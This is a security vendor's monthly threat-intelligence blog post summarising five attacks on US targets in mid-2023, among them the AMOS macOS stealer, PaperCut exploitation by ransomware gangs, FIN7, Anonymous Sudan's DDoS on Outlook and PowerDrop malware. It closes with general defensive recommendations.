Top 5 Cyber Threats Observed in the United States (May-June 2023)

At SISA, we understand the ever-evolving nature of cyber threats and the importance of staying one step ahead to protect your organization’s sensitive data and assets. Our dedicated team of experts is constantly monitoring various platforms, gathering intelligence, and analyzing the latest cyber threats to provide valuable insights into the latest cyber risks that can impact organizations.

This monthly post provides a condensed overview of the threats encountered throughout the month.

Our team brings to you five significant threats that have recently targeted the United States, including AMOS malware stealing keychain passwords and crypto wallets, the Bl00dy Ransomware Gang exploiting critical vulnerabilities in PaperCut servers, the notorious FIN7 group resurfacing with Cl0p ransomware, Anonymous Sudan launching DDoS attacks on Outlook.com, and the insidious PowerDrop malware targeting the U.S. aerospace defense industry.

Read on to discover more…

1. A new Mac malware that steals Keychain passwords and crypto wallets

AMOS (Atomic macOS Stealer) is a highly sophisticated malware that cybercriminals are actively using to target macOS users. Priced at $1,000 per month, AMOS offers a range of malicious tools, including a web panel for managing victims, a MetaMask brute-forcer, a cryptocurrency checker, and a dmg installer. The malware employs various distribution channels, such as phishing emails, malvertising, social media posts, and instant messages. Once executed, AMOS prompts the victim with a fake password prompt to acquire system privileges, enabling access to sensitive data. It then targets macOS’s Keychain password manager, extracting login credentials and encrypted data. AMOS further extracts information from cryptocurrency wallets, web browsers, and files stored on the victim’s desktop and documents directories. Stolen data is compressed into a ZIP file and sent to the command-and-control server of the threat actor.

2. Bl00dy ransomware gang strikes education sector with critical PaperCut vulnerability

The Bl00dy Ransomware Gang has been actively targeting vulnerable PaperCut servers in the education facilities sector, exploiting the CVE-2023-27350 flaw. This flaw, present in certain versions of PaperCut NG and PaperCut MF, allows remote code execution without credentials by bypassing user authentication. The FBI and CISA recently issued a joint advisory regarding this threat. The gang gained access to victim’s networks and conducted various malicious activities, including data exfiltration, and encrypting victim systems. They used TOR along with other proxies within the victim’s networks to mask their malicious traffic and avoid detection. The attackers leveraged the elevated privileges of the PaperCut server process, enabling them to execute additional processes with SYSTEM- or root-level privileges. This allowed them to perform a range of post-exploitation activities following the initial compromise. The Bl00dy Ransomware Gang left ransom notes on compromised systems, demanding payment for decrypting the encrypted files.

3. Notorious FIN7 returns with Cl0p ransomware in new wave of attacks

FIN7, a notorious cybercrime group known for targeting the U.S. retail, restaurant, and hospitality sectors, recently resurfaced after a two-year hiatus to carry out opportunistic ransomware attacks. The group has a history of targeting various industries and has deployed different ransomware variants in the past, including REvil, Maze, DarkSide, and BlackMatter. In their recent attacks, FIN7 employed the POWERTRASH malware dropper, utilizing PowerShell, to deploy the Lizar post-exploitation tool on compromised devices. This allowed the threat actors to establish a foothold within the targeted network and move laterally to deploy the Clop ransomware using OpenSSH and Impacket. Microsoft has also noted that FIN7’s return is not limited to the new variant of Clop ransomware, as the group has been linked to attacks on PaperCut printing servers with Bl00dy, LockBit, and Clop ransomware in the past. Additionally, other threat groups have been observed using tools associated with FIN7, such as the financially motivated group FIN11 was observed using a new tool – the inv.ps1 PowerShell script, which is said to be used by the FIN7 group to deploy the Lizar toolkit.

4. Outlook.com hit by outages as Anonymous Sudan claims DDoS attacks

Microsoft Outlook recently experienced widespread outages, affecting thousands of American users, following claims by hacktivist group Anonymous Sudan that they had initiated a campaign targeting US companies and infrastructure. The service faced multiple disruptions, hampering users worldwide from accessing or sending emails and using the mobile Outlook app. While Microsoft attributed the outages to technical issues, Anonymous Sudan asserted responsibility for launching DDoS attacks against Microsoft, citing their opposition to US involvement in Sudanese internal affairs. One of the monitoring sites reported that the Microsoft service was out for about 15,000 users. The group has been taunting Microsoft in statements about the repeated DDoS attacks on Microsoft Outlook and Microsoft 365 services, sharing images of their alleged activities on encrypted Telegram channels.

5. A new insidious PowerShell script targets the US aerospace defense industry

Security researchers recently uncovered a new malware called PowerDrop, believed to be targeting the aerospace industry in the United States. This sophisticated malware, leveraging PowerShell, employs deceptive techniques like encoding and encryption to evade detection. A sample of the malware was discovered within the network of a US defense contractor. PowerDrop combines PowerShell and Windows Management Instrumentation (WMI) to function as a Remote Access Trojan (RAT) with persistence. The malware utilizes Internet Control Message Protocol (ICMP) echo request messages, acting as triggers for its command and control (C2) functionality, as well as employing ICMP ping techniques for data exfiltration. Analysts speculate that the script may have been deployed via exploits, phishing emails, or spoofed software download sites. The primary objective of PowerDrop appears to be executing remote commands within infiltrated networks and maintaining persistence on targeted servers. The combination of its operation tactics, timing, and targeted industry suggests the involvement of a likely state-sponsored threat actor.

Key recommendations to combat cyber risks:

• Use strong passwords and enable multi-factor authentication whenever possible.
• Exercise caution when opening links received via email.
• Regularly update your devices, operating systems, and applications to ensure they have the latest security patches and protections.
• Install reputable antivirus and internet security software on your system.
• Employ Endpoint Detection and Response tools that detect multiple stages of the attack lifecycle to prevent execution of the malware.
• Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
• Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege.
• Enroll in a DDoS (Cloud) Mitigation protection service.
• Conduct vulnerability scans on Windows systems.
• Remain vigilant for any unusual pinging activity originating from your networks toward external sources.